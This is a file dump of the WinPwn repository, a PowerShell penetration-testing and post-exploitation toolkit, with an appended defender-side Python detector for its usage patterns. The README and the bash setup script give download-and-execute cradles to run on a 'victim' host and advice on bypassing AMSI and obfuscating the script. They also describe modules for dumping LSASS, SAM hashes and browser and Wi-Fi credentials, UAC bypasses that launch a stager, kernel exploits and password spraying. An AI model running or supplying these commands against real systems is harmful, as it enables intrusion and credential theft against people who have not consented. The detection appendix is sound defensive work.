├── .github
    └── FUNDING.yml
├── .gitmodules
├── Get_WinPwn_Repo.sh
├── LICENSE
├── Offline_WinPwn.ps1
├── README.md
├── WinPwn.ps1
└── images
    ├── Kovert.png
    ├── README.MD
    ├── WinPwn.JPG
    └── happy_alp.png

/.github/FUNDING.yml:
--------------------------------------------------------------------------------
# These are supported funding model platforms

github: [S3cur3Th1sSh1t]

--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/a69199b1b60bb175f6093f7a2d31b600020613ab/.gitmodules

--------------------------------------------------------------------------------
/Get_WinPwn_Repo.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Download script for a local WinPwn repository by 0x23353435
# All WinPwn functions can be used over a local webserver on victims without internet connection.
# After installing this local repo you can either use the --start-server option of this script or start your own server with the following command:
# python3 -m http.server {Portnumber}
# To make WinPwn.ps1 use this local repo, just use the parameter -repo:
# PS> iex (new-object net.webclient).downloadstring('http://{IP-Address}:{Portnumber}/WinPwn_Repo/WinPwn/master/WinPwn.ps1')
# PS> WinPwn -repo http://{IP-Address}:{Portnumber}/WinPwn_Repo

echo -e "\e[1;94m__ ___ ____ "
echo -e "\ \ / (_)_ __ | _ \__ ___ __ "
echo -e " \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ "
echo -e " \ V V / | | | | | __/ \ V V /| | | |"
echo -e " \_/\_/ |_|_| |_|_| \_/\_/ |_| |_|"
echo -e " "
echo -e " ---> Create your local WinPwn repo! \e[0m\n"

# Print the usage text.
function show-help () {
    echo -e "Usage:"
    echo -e "\e[1;94m./Get_WinPwn_Repo.sh {Option}\e[0m\n"
    echo -e "Example:"
    echo -e "\e[1;94m./Get_WinPwn_Repo.sh --install\e[0m\n"
    echo -e "Options:"
    echo -e "\e[1;94m--install\e[0m Download the repository and place it to \e[1;94m./WinPwn_Repo/\e[0m"
    echo -e "\e[1;94m--remove\e[0m Remove the repository \e[1;94m./WinPwn_Repo/\e[0m"
    echo -e "\e[1;94m--reinstall\e[0m Remove the repository and download a new one to \e[1;94m./WinPwn_Repo/\e[0m"
    echo -e "\e[1;94m--start-server\e[0m Start a \e[1;94mpython HTTP server\e[0m on port 8000"
    echo -e "\e[1;94m--help\e[0m Show this help"
}

# Clone each required repository into ./WinPwn_Repo/<name>/master/.
function install () {
    echo -e "\e[1;94mGetting PowerSharpPack...\e[0m"
    git clone https://github.com/S3cur3Th1sSh1t/PowerSharpPack ./WinPwn_Repo/PowerSharpPack/master/
    echo -e "\n\e[1;94mGetting WinPwn...\e[0m"
    git clone https://github.com/S3cur3Th1sSh1t/WinPwn ./WinPwn_Repo/WinPwn/master/
    echo -e "\n\e[1;94mGetting SharpCradle...\e[0m"
    git clone https://github.com/S3cur3Th1sSh1t/Invoke-Sharpcradle ./WinPwn_Repo/Invoke-Sharpcradle/master/
    echo -e "\n\e[1;94mGetting Creds...\e[0m"
    git clone https://github.com/S3cur3Th1sSh1t/Creds ./WinPwn_Repo/Creds/master/
    echo -e "\n\e[1;94mGetting TeamViewerDecrypt...\e[0m"
    git clone https://github.com/S3cur3Th1sSh1t/TeamViewerDecrypt ./WinPwn_Repo/TeamViewerDecrypt/master/
    echo -e "\n\e[1;94mGetting Get-System-Techniques...\e[0m"
    git clone https://github.com/S3cur3Th1sSh1t/Get-System-Techniques ./WinPwn_Repo/Get-System-Techniques/master/
    echo -e "\n\e[1;94mGetting ACLight...\e[0m"
    git clone https://github.com/S3cur3Th1sSh1t/ACLight ./WinPwn_Repo/ACLight/master/
    echo -e "\n\e[1;94mGetting SpoolerScanner...\e[0m"
    git clone https://github.com/S3cur3Th1sSh1t/SpoolerScanner ./WinPwn_Repo/SpoolerScanner/master/

    echo -e "\n\e[1;94mDone!\e[0m"
    echo -e "\nThe local repository can be found under: \e[1;94m$PWD/WinPwn_Repo/\e[0m"
    echo -e "\nNow you can open a \e[1;94mpython HTTP server\e[0m here to use \e[1;94mWinPwn.ps1\e[0m with this custom repo."
    echo -e "Example usage on your Windows victim:"
    echo -e "\e[1;94mPS> \e[94miex (new-object net.webclient).downloadstring('\e[91mhttp://192.168.1.10:8000/WinPwn_Repo\e[94m/WinPwn/master/WinPwn.ps1')\e[0m"
    echo -e "\e[1;94mPS> \e[94mWinPwn -repo \e[91mhttp://192.168.1.10:8000/WinPwn_Repo\e[0m"
}

# Delete the local repository directory.
function remove () {
    rm -rf ./WinPwn_Repo
    echo -e "\n\e[1;94mDone!\e[0m"
    echo -e "\nThe local repository was removed!"
}

# Serve the current directory over HTTP on port 8000.
function start-server () {
    python3 -m http.server 8000
}

if [ "$#" -eq 1 ]; then
    case "$1" in
        "--install" )
            install
            ;;
        "--reinstall" )
            remove
            install
            ;;
        "--remove" )
            remove
            ;;
        "--start-server" )
            start-server
            ;;
        * )
            show-help
            ;;
    esac
else
    show-help
fi

exit 0

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2019, SecureThisShit
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its
   contributors may be used to endorse or promote products derived from
   this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
[![](https://img.shields.io/badge/Donate-Bitcoin-blue.svg?style=flat)](https://blockchain.info/address/1MXReD1F4w5SUXK3phLVJ5M8KrXJHfecmZ)

# Sponsored by

[](https://www.bluebastion.net/)

# WinPwn
In many past internal penetration tests I often had problems with the existing PowerShell Recon / Exploitation scripts due to missing proxy support. I also often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetration test processes as possible (reconnaissance as well as exploitation), and for the proxy reason, I wrote my own script with automatic proxy recognition and integration.
The script is mostly based on other well-known, large offensive security PowerShell projects.

Any suggestions, feedback, pull requests and comments are welcome!

Just import the modules with:

`Import-Module .\WinPwn.ps1` or
`iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')`

To bypass AMSI take one of the existing [bypass techniques](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell), find the AMSI [trigger](https://github.com/RythmStick/AMSITrigger) and manually change it in the bypass function or encode the trigger string. Alternatively obfuscate the whole script.

If you find yourself stuck on a Windows system with no internet access - no problem at all, just use `Offline_Winpwn.ps1`; the most important scripts and executables are included.

Functions available after import:
* #### `WinPwn` -> Menu to choose attacks:
    ![alt text](https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/images/WinPwn.JPG)
* #### `Inveigh` -> Executes Inveigh in a new console window, SMB-Relay attacks with session management (Invoke-TheHash) integrated
* #### `SessionGopher` -> Executes SessionGopher, asking you for parameters
* #### `Kittielocal` ->
    * Obfuscated Invoke-Mimikatz version
    * Safetykatz in memory
    * Dump lsass using rundll32 technique
    * Download and run obfuscated Lazagne
    * Dump Browser credentials
    * Customized Mimikittenz Version
    * Exfiltrate Wifi-Credentials
    * Dump SAM-File NTLM Hashes
    * SharpCloud
* #### `Localreconmodules` ->
    * Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more
    * Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6, WSUS over HTTP
    * Checks the PowerShell event logs for credentials or other sensitive information
    * Collect Browser Credentials and history
    * Search for passwords in the registry and on the file system
    * Find sensitive files (config files, RDP files, keepass Databases)
    * Search for .NET Binaries on the local system
    * Optional: Get-Computerdetails (Powersploit) and PSRecon
* #### `Domainreconmodules` ->
    * Collect various domain information for manual review
    * Find AD-Passwords in description fields
    * Search for potential sensitive domain share files
    * Unconstrained delegation systems/users are enumerated
    * Generate Bloodhound Report
    * MS17-10 Scanner for domain systems
    * Bluekeep Scanner for domain systems
    * SQL Server discovery and Auditing functions - PowerUpSQL
    * MS-RPRN Check for domain controllers or all systems
    * Group Policy Audit with Grouper2
    * An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon
    * Check Printers for common vulns
    * Search for Resource-Based Constrained Delegation attack paths
    * Check all DCs for zerologon - CVE-2020-1472
    * And more, just take a look
* #### `Privescmodules`
    * itm4ns Invoke-PrivescCheck
    * winPEAS
    * Powersploits PowerUp Allchecks, Sherlock, GPPPasswords
    * Dll Hijacking, File Permissions, Registry permissions and weak keys, Rotten/Juicy Potato Check
* #### `kernelexploits` ->
    * MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only!
    * MS16-032 - (2008/7/8/10/2012)!
    * MS16-135 - (WS2k16 only)!
    * CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
    * CVE-2019-0841 - April 2019!
    * CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019!
    * CVE-2019-1129/1130 - Race Condition, multiple cores needed - July 2019!
    * CVE-2019-1215 - September 2019 - x64 only!
    * CVE-2020-0638 - February 2020 - x64 only!
    * CVE-2020-0796 - SMBGhost
    * CVE-2020-0787 - March 2020 - all windows versions
    * CVE-2021-34527/CVE-2021-1675 - June 2021 - PrintNightmare
    * CVE-2021-40449 - CallbackHell - October 2021
    * Juicy-Potato Exploit
    * itm4ns Printspoofer
* #### `UACBypass` ->
    * UAC Magic, Based on James Forshaw's three part post on UAC
    * UAC Bypass cmstp technique, by Oddvar Moe
    * DiskCleanup UAC Bypass, by James Forshaw
    * DccwBypassUAC technique, by Ernesto Fernandez and Thomas Vanhoutte
* #### `SYSTEMShell` ->
    * Pop System Shell using CreateProcess
    * Pop System Shell using NamedPipe Impersonation
    * Pop System Shell using Token Manipulation
    * Bind System Shell using UsoClient DLL load or CreateProcess
* #### `Shareenumeration` -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit)
* #### `Domainshares` -> Snaffler or Passhunt search over all domain systems
* #### `Groupsearch` -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)
* #### `Kerberoasting` -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
* #### `PowerSQL` -> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection Attacks
* #### `Sharphound` -> Bloodhound 3.0 Report
* #### `Adidnsmenu` -> Create Active Directory-Integrated DNS Nodes or remove them
* #### `MS17-10` -> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerability
* #### `Sharpcradle` -> Load C# Files from a remote Webserver to RAM
* #### `DomainPassSpray` -> DomainPasswordSpray Attacks, one password for all domain users
* #### `Bluekeep` -> Bluekeep Scanner for domain systems

Without parameters, most of the functions can only be used from an interactive shell. So I decided to add the parameters `-noninteractive` and `-consoleoutput` to make the script usable from an asynchronous C2-Framework like Empire, Covenant, Cobalt Strike or others.
Additionally the `-repo` parameter was added to use WinPwn with all its features from a local repository. They can be used as follows:

Usage:

-noninteractive -> No questions for functions so that they run with predefined or user defined parameters

-consoleoutput -> The loot/report folders are not created. Every function returns the output to the console so that you can take a look at everything in the Agent logs of your C2-Framework

Examples:

`WinPwn -noninteractive -consoleoutput -DomainRecon` -> This will return every single domain recon script and function and will probably give you a lot of output

`WinPwn -noninteractive -consoleoutput -Localrecon` -> This will enumerate as much information for the local system as possible

`Generalrecon -noninteractive` -> Execute basic local recon functions and store the output in the corresponding folders

`UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp` -> Execute a stager in a high integrity process from a low privileged session

`Kittielocal -noninteractive -consoleoutput -browsercredentials` -> Dump Browser-Credentials via Sharpweb returning the output to console

`Kittielocal -noninteractive -browsercredentials` -> Dump SAM File NTLM-Hashes and store the output in a file

`WinPwn -PowerSharpPack -consoleoutput -noninteractive` -> Execute Seatbelt, PowerUp, Watson and more C# binaries in memory

`Dotnetsearch -consoleoutput -noninteractive` -> Search in `C:\Program Files\` and `C:\Program Files (x86)\` for .NET assemblies

`WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo` -> Use a local webserver as offline repo to use WinPwn without internet access

Get_WinPwn_Repo.sh:

Usage:
./Get_WinPwn_Repo.sh {Option}

Example:
./Get_WinPwn_Repo.sh --install

Options:
--install         Download the repository and place it to ./WinPwn_Repo/
--remove          Remove the repository ./WinPwn_Repo/
--reinstall       Remove the repository and download a new one to ./WinPwn_Repo/
--start-server    Start a python HTTP server on port 8000
--help            Show this help

## TO-DO
- [x] Some obfuscation
- [x] More obfuscation
- [ ] Proxy via PAC-File support
- [x] Get the scripts from my own creds repository (https://github.com/S3cur3Th1sSh1t/Creds) to be independent from changes in the original repositories
- [ ] More Recon/Exploitation functions
- [x] Add menu for better handling of functions
- [x] Amsi Bypass
- [X] Block ETW

## CREDITS

- [X] [Kevin-Robertson](https://github.com/Kevin-Robertson/) - Inveigh, Powermad, Invoke-TheHash
- [X] [Arvanaghi](https://github.com/Arvanaghi/) - SessionGopher
- [X] [PowerShellMafia](https://github.com/PowerShellMafia/) - Powersploit
- [X] [Dionach](https://github.com/Dionach/) - PassHunt
- [X] [A-mIn3](https://github.com/A-mIn3/) - WINSpect
- [X] [411Hall](https://github.com/411Hall/) - JAWS
- [X] [sense-of-security](https://github.com/sense-of-security/) - ADrecon
- [X] [dafthack](https://github.com/dafthack/) - DomainPasswordSpray
- [X] [rasta-mouse](https://github.com/rasta-mouse/) - Sherlock, Amsi Bypass, PPID Spoof & BlockDLLs
- [X] [AlessandroZ](https://github.com/AlessandroZ/) - LaZagne
- [X] [samratashok](https://github.com/samratashok/) - nishang
- [X] [leechristensen](https://github.com/leechristensen/) - Random Repo, Spoolsample, other ps1 scripts
- [X] [HarmJ0y](https://github.com/HarmJ0y) - Many good Blogposts, Gists and Scripts, all Ghostpack binaries
- [X] [NETSPI](https://github.com/NetSPI/) - PowerUpSQL
- [X] [Cn33liz](https://github.com/Cn33liz/) - p0wnedShell
- [X] [rasta-mouse](https://github.com/rasta-mouse/) - AmsiScanBufferBypass
- [X] [l0ss](https://github.com/l0ss/) - Grouper2,Snaffler,Grouper3
- [X] [dafthack](https://github.com/dafthack/) - DomainPasswordSpray
- [X] [enjoiz](https://github.com/enjoiz/Privesc) - PrivEsc
- [X] [itm4n](https://github.com/itm4n) - Invoke-PrivescCheck & PrintSpoofer
- [X] [James Forshaw](https://github.com/tyranid) - UACBypasses
- [X] [Oddvar Moe](https://github.com/api0cradle) - UACBypass
- [X] [Carlos Polop](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) - winPEAS
- [X] [gentilkiwi](https://github.com/gentilkiwi) - Mimikatz, Kekeo
- [X] [hlldz](https://github.com/hlldz) - Invoke-Phantom
- [X] [Matthew Graeber](https://github.com/mattifestation) - many Ps1 Scripts which are used nearly everywhere
- [X] [Steve Borosh](https://github.com/rvrsh3ll/) - Misc-Powershell-Scripts, SharpPrinter, SharpSSDP
- [X] [Sean Metcalf](https://twitter.com/PyroTek3) - SPN-Scan + many useful articles @adsecurity.org
- [X] [@l0ss and @Sh3r4](https://github.com/SnaffCon/Snaffler) - Snaffler
- [X] [FSecureLABS](https://github.com/FSecureLABS) - GPO Tools
- [X] [vletoux](https://github.com/vletoux) - PingCastle Scanners
- [X] [NCCGroup + BC-Security](https://github.com/BC-SECURITY/Invoke-ZeroLogon) - ZeroLogon Scanner
- [X] [All people working on Bloodhound](https://github.com/BloodHoundAD) - SharpHound Collector
- [X] [klezVirus](https://github.com/klezVirus) - SharpLdapRelayScan
- [X] [cube0x0](https://github.com/cube0x0) - LdapSignCheck + other toolings
- [X] [@s4ntiago_p](https://twitter.com/s4ntiago_p) - NanoDump
- [X] [@thefLinkk](https://twitter.com/thefLinkk) - Handlekatz
- [X] [@Mayyhem](https://github.com/Mayyhem/SharpSCCM) - SharpSCCM
- [X] [@cube0x0](https://github.com/cube0x0/LdapSignCheck) - LdapSignCheck
- [X] [@klezVirus](https://github.com/klezVirus/SharpLdapRelayScan) - SharpLdapRelayScan
- [X] [@HarmJ0y, @leechristensen, @CCob](https://github.com/GhostPack/Certify/) - Certify
- [X] [@Yudasm](https://github.com/Friends-Security/ShadowHound) - ShadowHound
- [X] [Many more people in the Community](https://github.com/search?q=infosec) - I'm sure that I've forgotten many other individuals who indirectly contributed to this script

## Stargazers over time

[![Stargazers over time](https://starchart.cc/S3cur3Th1sSh1t/WinPwn.svg)](https://starchart.cc/S3cur3Th1sSh1t/WinPwn)

## Legal disclaimer:
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

--------------------------------------------------------------------------------
/images/Kovert.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/a69199b1b60bb175f6093f7a2d31b600020613ab/images/Kovert.png

--------------------------------------------------------------------------------
/images/README.MD:
--------------------------------------------------------------------------------
Just Pictures

--------------------------------------------------------------------------------
/images/WinPwn.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/a69199b1b60bb175f6093f7a2d31b600020613ab/images/WinPwn.JPG

--------------------------------------------------------------------------------
/images/happy_alp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/a69199b1b60bb175f6093f7a2d31b600020613ab/images/happy_alp.png

--------------------------------------------------------------------------------
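A defender-side example, added here and not part of the WinPwn repository: it scans PowerShell script block logging text (event ID 4104) for the download cradle, the `-repo` parameter and the unattended switches that the README in this dump documents. The sample records, the `classify` and `triage` names and the finding labels are constructed for this example.

```python
import re

# Names taken from the README and Get_WinPwn_Repo.sh on this page.
PROJECTS = ("winpwn", "powersharppack", "invoke-sharpcradle", "creds",
            "teamviewerdecrypt", "get-system-techniques", "aclight",
            "spoolerscanner")
FUNCTIONS = ("winpwn", "kittielocal", "generalrecon", "uacbypass",
             "dotnetsearch", "localreconmodules", "domainreconmodules")
SWITCHES = ("-noninteractive", "-consoleoutput")

# (New-Object Net.WebClient).DownloadString('<url>'), whitespace-tolerant.
CRADLE = re.compile(
    r"net\.webclient\s*\)?\s*\.\s*downloadstring\s*\(\s*['\"]([^'\"]+)['\"]")
EXECUTE = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])")
# <base>/<project>/master/ is the path layout the download script creates.
LAYOUT = re.compile(
    r"/(?:" + "|".join(re.escape(p) for p in PROJECTS) + r")/master/")
REPO_ARG = re.compile(
    r"(?<![\w./-])winpwn\s[^;|]*?-repo\s+['\"]?(https?://[^\s'\"]+)")
CALL = re.compile(
    r"(?<![\w./-])(" + "|".join(FUNCTIONS) + r")(?![\w-])([^;|]*)")

def normalize(script_block):
    """PowerShell ignores case and extra whitespace, so compare without them."""
    return re.sub(r"\s+", " ", script_block).strip().lower()

def classify(script_block):
    """Return finding labels for one ScriptBlockText value."""
    text = normalize(script_block)
    findings = []
    cradle = CRADLE.search(text)
    # A download alone is not flagged; it must be paired with execution.
    if cradle and EXECUTE.search(text):
        url = cradle.group(1)
        findings.append("download-cradle")
        if LAYOUT.search(url):
            findings.append("winpwn-repo-layout")
        if url.startswith("http://"):
            findings.append("cleartext-source")
    if REPO_ARG.search(text):
        findings.append("local-repo-parameter")
    for name, args in CALL.findall(text):
        if any(switch in args for switch in SWITCHES):
            findings.append("unattended-module-call:" + name)
    return findings

# Constructed sample records: (host, ScriptBlockText). Not real log data.
SAMPLES = [
    ("ws01", "iex (new-object net.webclient).downloadstring("
             "'http://192.168.1.10:8000/WinPwn_Repo/WinPwn/master/WinPwn.ps1')"),
    ("ws01", "WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo"),
    ("ws02", "IEX ( New-Object  Net.WebClient ).DownloadString( \"https://"
             "raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\" )"),
    ("ws03", "Kittielocal -noninteractive -consoleoutput -browsercredentials"),
    ("ws04", "$v = (New-Object Net.WebClient).DownloadString("
             "'https://intranet.example/version.txt')"),
]

def triage(records):
    """Return (host, findings) for every record that has findings."""
    scored = ((host, classify(text)) for host, text in records)
    return [(host, found) for host, found in scored if found]

if __name__ == "__main__":
    print(triage(SAMPLES))
```

Literal matching of this kind is one layer only, since the README itself recommends obfuscating the script; pair it with AMSI and network telemetry.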